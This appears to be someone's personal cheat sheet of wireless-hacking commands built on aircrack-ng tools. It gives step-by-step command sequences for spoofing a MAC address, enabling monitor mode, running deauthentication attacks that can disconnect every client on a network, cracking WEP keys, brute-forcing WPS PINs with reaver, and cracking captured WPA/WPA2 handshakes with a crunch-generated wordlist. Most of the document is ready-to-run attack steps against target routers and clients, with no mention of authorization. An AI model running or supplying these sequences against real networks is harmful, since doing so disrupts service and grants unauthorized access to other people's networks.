man [command]  ---> introduces the command

cat [file] ---> opens the file

apt-get update
apt-get install ...


chmod +x [file name]  ---> make the file executable


ifconfig : list all the network interfaces 


CHANGING MAC ADDRESS
--------------------
ifconfig eth0 down 
ifconfig eth0 hw ether 00:11:22:33:44:55(e.g.)
ifconfig eth0 up 


iwconfig ---> to see the wireless interfaces only


CHANGING MODE TO MONITOR
------------------------
ifconfig wlan0 down              |   |
airmon-ng check kill             | = |  airmon-ng start wlan0
iwconfig wlan0 mode monitor      |   | 
ifconfig wlan0 up                |   |


airodump-ng wlan0 ---> to see all the packets (for ~2 GHz)

airodump-ng --band a wlan0 ---> (for ~5 GHz)

airodump-ng --band abg wlan0 ---> (for both 2.4 and 5 GHz)

airodump-ng --bssid 00:11:22:33:44:55 --channel 5 --write test wlan0 ---> just for target router


DEAUTHENTICATION ATTACK
-----------------------
1)  airodump-ng --bssid [MAC of the router] --channel 5 wlan0
While 1 is working:
2)  aireplay-ng --deauth 10000000 -a [MAC of the router] -c [MAC address of the target] wlan0
(If you don't write -c, everyone will leave the network)

CRACKING WEP IN BUSY NETWORK
----------------------------
1)  airodump-ng wlan0 ---> find the network using WEP and stop
2)  airodump-ng --bssid [MAC of target router] --channel [channel of target router] --write basic_wep wlan0 
While 2 is working:
3)  aircrack-ng basic_wep-01.cap 


CRACKING WEP IN NOT BUSY NETWORK
--------------------------------
1)  airodump-ng wlan0 ---> find the network using WEP and stop
2)  airodump-ng --bssid [Target router MAC] --channel [Target router channel] --write arpreplay wlan0
While 2 is working:
3)  aireplay-ng --fakeauth 0 -a [Target router MAC] -h [Wireles adapter MAC] wlan0
4)  aireplay-ng --arpreplay -b [Target router MAC] -h [Wireles adapter MAC] wlan0
5)  aireplay-ng --fakeauth 0 -a [Target router MAC] -h [Wireles adapter MAC] wlan0
While 2 and 4 are working:
6)  aircrack-ng arpreplay-01.cap


CRACKING WPA/WPA2 WITH WPS OPEN
-------------------------------
1)  wash --interface wlan0  ---> find the network using WPS
2)  reaver --bssid [Router MAC] --channel [Router channel] --interface wlan0 -vvv --no-associate
While 2 is working:
3)  aireplay-ng --fakeauth 30 -a [Router MAC] -h [Adapter MAC] wlan0


CRACKING WPA/WPA2 WITH WPS DISABLED OR ENABLED BUT CONFIGURED TO USE PBC
------------------------------------------------------------------------
1)  airodump-ng wlan0  ---> copy the router MAC
2)  airodump-ng --bssid [Router MAC] --channel [Router channel] --write [File Name] wlan0
While 2 is working:
3)  aireplay-ng --deauth 4 -a [Router MAC] -c [Client MAC] wlan0   ---> quit airodump-ng when you see the handshake
4)  crunch 10 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o test.txt
5)  aircrack-ng wpa_handshake-01.cap -w test.txt

***CRUNCH: crunch [Min] [Max] [Characters] -t [Pattern] -o [FileName.txt]